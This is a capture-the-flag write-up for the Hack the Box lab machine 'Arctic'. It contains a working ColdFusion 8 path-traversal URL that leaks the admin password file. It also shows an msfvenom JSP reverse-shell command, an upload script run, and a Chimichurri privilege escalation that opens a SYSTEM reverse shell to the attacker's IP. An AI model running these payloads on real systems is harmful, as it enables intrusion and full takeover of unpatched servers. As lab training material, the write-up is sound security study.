Hack the Box Arctic
Write-up on HTB’s retired machine “Arctic” that outlines manual exploitation.
Disclaimer
This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.
Reconnaissance
First, let’s use the nmapAutomator to automate the process of recon/enumeration.
Summary of our nmap scan results:
Running all scans on 10.10.10.11
Host is likely running Windows
---------------------Starting Nmap Quick Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-13 21:28 EDT
Nmap scan report for 10.10.10.11
Host is up (0.019s latency).
Not shown: 997 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
135/tcp open msrpc
8500/tcp open fmtp
49154/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 6.29 secondsEnumeration
Skipping the unknown tcp port for now and the msrpc port. Let’s check what we have on tcp/8500
Further research for Adobe CF8 exploit led me to the following exploits to possible gain our initial foothold.
The first exploit we tried from exploitdb/146641 gave us the admin password of the ColdFusion application.
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
We were able to login to the CF admin console after executing the path traversal exploit.
Based on the CVE write-up, we should be able to take advantage by uploading files to a CF server via the administrator console and scheduled task that would download cfexec.cfm to the server’s webroot. A bit painful, however, we still have the other possible exploit to test and see if we could use that instead.
Using ‘upload.py’:
First step is to create our payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.37 LPORT=4444 -f raw > shell.jspRun the script
root@cainta:~/Documents/htb/Artic# ./upload.py 10.10.10.11 8500 shell.jsp
Sending payload...
Successfully uploaded payload!
Find it at http://10.10.10.11:8500/userfiles/file/exploit.jspLoad netcat and execute the payload
Initial Foothold
Privilege Escalation
Execute systeminfo to get additional information from our server. This will assist us on elevating our user privilege.
C:\ColdFusion8\runtime\bin>systeminfo
systeminfo
Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45 ▒▒
System Boot Time: 16/8/2020, 10:14:54 ▒▒
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.023 MB
Available Physical Memory: 378 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 1.213 MB
Virtual Memory: In Use: 834 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.11
C:\ColdFusion8\runtime\bin>Ran windows-exploit suggester and we obtained the following results
root@cainta:~/Documents/htb/Artic# ./windows-exploit-suggester.py --database 2020-06-07-mssb.xls --systeminfo systeminfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
root@cainta:~/Documents/htb/Artic#Several trial and error led us to MS10–059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) — Important
Found Chimichurri
Once you have chimichurri.exe, host it so the you can download it from the CF server.
Load another netcat listener and execute Chimichurri.exe
c:\Users\tolis\Downloads>Chimichurri.exe 10.10.14.37 9999
Chimichurri.exe 10.10.14.37 9999
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
c:\Users\tolis\Downloads>root@cainta:~/Documents/htb/Artic# rlwrap nc -nlvp 9999
listening on [any] 9999 ...connect to [10.10.14.37] from (UNKNOWN) [10.10.10.11] 49844
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.c:\Users\tolis\Downloads>c:\Users\tolis\Downloads>whoami
whoami
nt authority\system
Lessons learned
Found different possible exploits (entry point) to this server but what I have illustrated seems the most straight forward way.
References
- https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
- https://repo.theoremforge.com/pentesting/tools/blob/01a0616a6e09c9dbf42d731261309109443cc3e6/Uncategorized/exploit/windows/CVE-2009-2265_coldfusion.8.0.1/upload.py
- https://github.com/AonCyberLabs/Windows-Exploit-Suggester
